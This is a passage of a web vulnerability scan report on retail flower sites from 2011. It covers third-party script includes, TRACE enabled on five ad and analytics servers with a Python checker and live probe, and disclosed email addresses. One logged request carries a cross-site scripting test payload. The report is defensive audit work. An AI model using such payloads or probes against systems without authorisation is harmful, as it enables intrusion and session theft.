Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:43 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:10:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:43 GMT
Content-Length: 184823


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.30. http://www.proflowers.com/mothers-day-flowers-MDF

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero1&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:22 GMT
Content-Length: 238190


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.31. http://www.proflowers.com/send-flowers-bsl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /send-flowers-bsl?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:17:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:17:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:23 GMT
Content-Length: 251606


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

18. TRACE method is enabled
There are 5 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response, with the content type message/http, the exact request which was received, including any headers that proxies or load balancers in the path added to it.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication (the cross-site tracing, or XST, technique). This may exacerbate the impact of other vulnerabilities, such as cross-site scripting. Two caveats apply when triaging it. First, browsers refuse to issue TRACE from script (XMLHttpRequest rejects the method, as does the later Fetch API), so the attack cannot be mounted from a page in a current browser, which is why the issue is rated Information. Second, the echo is still useful reconnaissance: instances 18.3 and 18.5 below echo a Connection: Keep-Alive and an X-Forwarded-For header that the scanner never sent, showing that a proxy sits in front of those servers and revealing the client address as the proxy saw it. All five hosts listed here are third-party advertising and analytics servers rather than the audited retail sites.

Issue remediation

The TRACE method should be disabled on the web server. On Apache httpd, which three of the five instances below run, this is the core directive TraceEnable off, after which the server answers TRACE with 405 Method Not Allowed; on other servers use the equivalent method restriction, or block the method at a reverse proxy in front of them. Verify the fix by sending a TRACE request and confirming that the response is no longer a 200 with a message/http body. Where the affected host belongs to a third party, as all five here do, the change is for that party to make.
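The check behind this issue, as an added example that is not part of the original report: the script below classifies a raw TRACE response the way the scanner does (status 200 plus a message/http body that starts with the echoed request line), lists any headers in the echo that the client never sent, and can send a live probe for re-testing after the fix. The SENT and SAMPLE_ENABLED bytes are copied from instance 18.3 below; SAMPLE_DISABLED is a constructed 405 reply of the kind Apache httpd returns once TraceEnable is off. The probe() function is a plain-socket TRACE request written for this example and is not exercised offline.

```python
import socket

# Request the scanner sent for instance 18.3 (copied from the report).
SENT = (
    b"TRACE / HTTP/1.0\r\n"
    b"Host: metrics.ftd.com\r\n"
    b"Cookie: e35dd88f7dc01a60\r\n"
    b"\r\n"
)

# Response to it, copied from instance 18.3: the echo carries two headers
# (Connection, X-Forwarded-For) that the scanner never sent.
SAMPLE_ENABLED = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 09 May 2011 01:00:40 GMT\r\n"
    b"Server: Omniture DC/2.0.0\r\n"
    b"Connection: close\r\n"
    b"Content-Type: message/http\r\n"
    b"\r\n"
    b"TRACE / HTTP/1.0\r\n"
    b"Host: metrics.ftd.com\r\n"
    b"Cookie: e35dd88f7dc01a60\r\n"
    b"Connection: Keep-Alive\r\n"
    b"X-Forwarded-For: 173.193.214.243\r\n"
)

# Constructed: what Apache httpd returns once TraceEnable is off.
SAMPLE_DISABLED = (
    b"HTTP/1.1 405 Method Not Allowed\r\n"
    b"Allow: GET,HEAD,POST,OPTIONS\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
    b"<html><body><h1>Method Not Allowed</h1></body></html>\r\n"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split(b" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers, body


def trace_enabled(raw):
    """True when the server honoured TRACE: status 200, a message/http body,
    and that body starting with the echoed request line.  A 405/501 or an
    HTML error page means the method is refused."""
    status, headers, body = parse_response(raw)
    ctype = headers.get("content-type", "").lower()
    return status == 200 and ctype.startswith("message/http") and body.lstrip().startswith(b"TRACE ")


def injected_headers(sent, raw):
    """Names of headers in the echoed request that the client did not send.
    Anything listed was added by a proxy or load balancer between client and
    origin, which is the reconnaissance value of an enabled TRACE."""
    _, _, body = parse_response(raw)
    sent_names = set()
    for line in sent.split(b"\r\n")[1:]:
        if b":" in line:
            sent_names.add(line.split(b":", 1)[0].strip().lower())
    extra = []
    for line in body.strip().split(b"\r\n")[1:]:
        if b":" in line:
            name = line.split(b":", 1)[0].strip().lower()
            if name not in sent_names:
                extra.append(name.decode("latin-1"))
    return extra


def probe(host, port=80, timeout=5.0):
    """Send a live TRACE / HTTP/1.0 and return the raw response bytes.
    Not exercised offline; only run it against hosts you are authorised to test."""
    request = b"TRACE / HTTP/1.0\r\nHost: " + host.encode("idna") + b"\r\nCookie: probe=1\r\n\r\n"
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    print("18.3 enabled:", trace_enabled(SAMPLE_ENABLED),
          "proxy-added:", injected_headers(SENT, SAMPLE_ENABLED))
    print("hardened    :", trace_enabled(SAMPLE_DISABLED))
```

Running the module prints True with the two proxy-added header names for the 18.3 capture and False for the hardened reply; to re-test a host after disabling TRACE, pass probe(host) to trace_enabled().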


18.1. http://att.adpxpx.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://att.adpxpx.com
Path:   /

Request

TRACE / HTTP/1.0
Host: att.adpxpx.com
Cookie: fbe867173de5b8e8

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:22 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: att.adpxpx.com
Cookie: fbe867173de5b8e8


18.2. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: 4a5b2ec768f9309f

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 72
Date: Mon, 09 May 2011 01:01:04 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: 4a5b2ec768f9309f

18.3. http://metrics.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.ftd.com
Cookie: e35dd88f7dc01a60

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:40 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.ftd.com
Cookie: e35dd88f7dc01a60
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


18.4. http://pixel.fetchback.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 96a1371c6c573665

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:45 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 96a1371c6c573665


18.5. http://pixel.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 2f42856becf3ae11

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:09:44 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 2f42856becf3ae11
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19. Email addresses disclosed
There are 5 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


19.1. http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media3.1800flowers.com
Path:   /800f_assets/jet/website/scripts/flowers/calendar/date.js

Issue detail

The following email address was disclosed in the response: matt@mattkruse.com, the author credit in the header of a third-party calendar library. It identifies the library's author, not site personnel, so its value to an attacker is limited to fingerprinting the component.

Request

GET /800f_assets/jet/website/scripts/flowers/calendar/date.js HTTP/1.1
Host: media3.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreAt=90074784=1|3|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 08 Jun 2006 14:00:42 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: application/x-javascript
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:01:49 GMT
Connection: close
Content-Length: 12728

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purp
...[SNIP]...

19.2. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media5.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css

Issue detail

The following email address was disclosed in the response: ewright@linescale.com, an author credit in the CSS file header. It names an individual at a vendor that supplies the site's survey banner, which is the kind of personal address the issue background describes.

Request

GET /800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css HTTP/1.1
Host: media5.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Sep 2010 15:39:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/css
Cache-Control: max-age=300
Date: Mon, 09 May 2011 01:00:45 GMT
Connection: close
Content-Length: 2434

/*
************************************************
* File: survey-invitation.css
* Last Updated: 11/17/09
* Author: Eric Wright <ewright@linescale.com>
*****************************
...[SNIP]...

19.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media5.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js

Issue detail

The following email address was disclosed in the response: eric@rapidsynergy.com, embedded in the minified survey-invitation.js after the bundled jQuery 1.3.2 code.

Request

GET /800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js HTTP/1.1
Host: media5.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 20 Sep 2010 15:15:35 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: application/x-javascript
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:00:45 GMT
Connection: close
Content-Length: 61772

// jQuery JavaScript Library v1.3.2 Copyright (c) 2009 John Resig Dual licensed under the MIT and GPL licenses.
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.
...[SNIP]...
<eric@rapidsynergy.com>
...[SNIP]...

19.4. https://ww30.1800flowers.com/checkoutsignin.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The following email address was disclosed in the response: webmaster@1800flowers.com, shown deliberately in the checkout sign-in text so that customers whitelist the sender of password emails. This is a role mailbox published on purpose and is not a finding that needs remediation.

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
